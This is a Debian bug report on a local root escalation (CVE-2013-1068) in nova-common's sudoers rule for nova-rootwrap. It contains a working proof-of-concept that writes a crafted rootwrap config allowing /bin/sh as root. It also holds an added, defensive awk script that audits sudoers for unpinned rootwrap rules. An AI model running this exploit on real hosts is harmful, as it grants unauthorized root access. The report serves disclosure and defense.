Package: nova-common
Version: 2014.1.1-1
Severity: grave
Tags: security, confirmed

After installing nova-common, the file /etc/sudoers.d/nova-common is created. If /etc/sudoers contains "#includedir /etc/sudoers.d", nova is vulnerable to the CVE-2013-1068 local privilege escalation. The vulnerability does not need a working OpenStack installation. If I am correct, OpenStack does not work without the includedir configuration, so it might usually be enabled in OpenStack instances.

PoC: https://bugs.launchpad.net/ubuntu/+source/nova/+bug/1185019

"""
echo [DEFAULT] >/tmp/my-rootwrap.conf
echo filters_path=/tmp/my-filters.d >>/tmp/my-rootwrap.conf
mkdir /tmp/my-filters.d
echo [Filters] >/tmp/my-filters.d/my.filters
echo my-shell: CommandFilter, /bin/sh, root >>/tmp/my-filters.d/my.filters
sudo nova-rootwrap /tmp/my-rootwrap.conf sh id
"""

-- System Information:
Debian Release: 7.5
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 3.2.0-4-amd64 (SMP w/8 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) (ignored: LC_ALL set to en_US.UTF-8)
Shell: /bin/sh linked to /bin/dash
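
Added example (not part of the original report, and not Debian's or OpenStack's code): a check an administrator could run over /etc/sudoers and the files in /etc/sudoers.d to flag rules that grant a *-rootwrap command without fixing the configuration file argument, which is the condition the PoC above depends on. The sample rules and the /etc/nova/rootwrap.conf path are constructed assumptions; the report does not show the contents of the packaged sudoers file.

```shell
#!/bin/sh
# Flag sudoers rules that leave the rootwrap config file up to the caller.
# A rule counts as pinned only when the rootwrap command is directly
# followed by a literal path under /etc/ (assumed location of the real
# config, e.g. /etc/nova/rootwrap.conf). Backslash-continued sudoers
# lines are not joined; review those by hand.

audit_rootwrap_sudoers() {
    # Usage: audit_rootwrap_sudoers FILE...
    # Prints "file:line: rule" for each unpinned rule; returns 1 if any found.
    awk '
        /^[ \t]*#/ { next }                  # comments and #includedir lines
        /-rootwrap/ {
            n = split($0, tok, /[ \t,]+/)
            for (i = 1; i <= n; i++) {
                # Only tokens that are a path ending in "<name>-rootwrap".
                if (tok[i] !~ "/[^/]*-rootwrap$") continue
                # The next token must be a wildcard-free path under /etc/.
                if (i == n || tok[i + 1] !~ "^/etc/[^*?]+$") {
                    printf "%s:%d: %s\n", FILENAME, FNR, $0
                    bad = 1
                }
            }
        }
        END { exit bad + 0 }
    ' "$@"
}

# Constructed sample rules for trying the check (not taken from the package).
make_samples() {
    # Usage: make_samples DIR
    printf '%s\n' \
        '# constructed: caller chooses the config file' \
        'nova ALL = (root) NOPASSWD: /usr/bin/nova-rootwrap' \
        > "$1/unpinned"
    printf '%s\n' \
        '# constructed: config file fixed by the rule' \
        'nova ALL = (root) NOPASSWD: /usr/bin/nova-rootwrap /etc/nova/rootwrap.conf *' \
        > "$1/pinned"
}

# When given file arguments, audit them, e.g.:
#   sh audit.sh /etc/sudoers /etc/sudoers.d/*
if [ "$#" -gt 0 ]; then
    audit_rootwrap_sudoers "$@"
fi
```

The exit status is 1 when any unpinned rule is found, so the script can be used as a gate in a configuration check.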